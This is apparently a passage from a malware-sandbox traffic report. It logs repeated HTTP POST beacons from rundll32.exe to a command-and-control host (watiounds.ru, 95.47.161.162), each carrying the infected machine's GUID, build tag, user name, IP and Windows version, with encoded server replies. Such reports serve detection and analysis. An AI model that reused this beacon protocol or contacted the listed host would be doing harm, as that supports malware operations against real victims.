                                          Data Raw: 63 0d 0a 41 43 58 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cACXZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          216 | 192.168.2.22 | 49381 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:02.376682043 CEST | 277 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:02.516799927 CEST | 277 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTHSGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          217 | 192.168.2.22 | 49382 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:02.843700886 CEST | 278 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:02.969145060 CEST | 278 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 47 54 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZGTAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          218 | 192.168.2.22 | 49383 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:03.296247005 CEST | 279 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:03.419274092 CEST | 279 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 56 45 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMVENARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          219 | 192.168.2.22 | 49384 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:03.733654976 CEST | 280 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:03.858052969 CEST | 280 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 56 45 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJVEQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          22 | 192.168.2.22 | 49187 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:33.287461996 CEST | 59 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:33.416454077 CEST | 60 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 41 5a 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHAZSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          220 | 192.168.2.22 | 49385 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:04.179527998 CEST | 281 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:04.308862925 CEST | 282 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:04 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZKPAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          221 | 192.168.2.22 | 49386 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:04.642546892 CEST | 282 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:04.770848036 CEST | 283 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:04 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 59 42 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBYBYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          222 | 192.168.2.22 | 49387 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:05.084758043 CEST | 283 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:05.208688974 CEST | 284 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:05 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZFUAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          223 | 192.168.2.22 | 49388 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:05.521861076 CEST | 284 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:05.644798040 CEST | 285 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:05 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 4a 51 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQJQJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          224 | 192.168.2.22 | 49389 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:05.968904972 CEST | 286 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:06.097517967 CEST | 286 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          225 | 192.168.2.22 | 49390 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:06.415041924 CEST | 287 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:06.537090063 CEST | 287 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 42 59 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQBYJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          226 | 192.168.2.22 | 49391 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:06.852171898 CEST | 288 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:06.974781990 CEST | 288 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQYBJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          227 | 192.168.2.22 | 49392 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:07.287061930 CEST | 289 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:07.410356045 CEST | 289 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 42 59 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHBYSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          228 | 192.168.2.22 | 49393 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:07.735584021 CEST | 290 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:07.865125895 CEST | 291 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZNMAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          229 | 192.168.2.22 | 49394 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:08.183953047 CEST | 291 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:08.306196928 CEST | 292 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:08 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 43 58 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYCXBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          23 | 192.168.2.22 | 49188 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:33.741050005 CEST | 61 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:33.870210886 CEST | 61 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCAZXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          230 | 192.168.2.22 | 49395 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:08.637944937 CEST | 292 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:08.766777039 CEST | 293 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:08 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 5a 41 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAZAZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          231 | 192.168.2.22 | 49396 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:09.087733984 CEST | 294 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:09.215297937 CEST | 294 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 56 45 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCVEXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
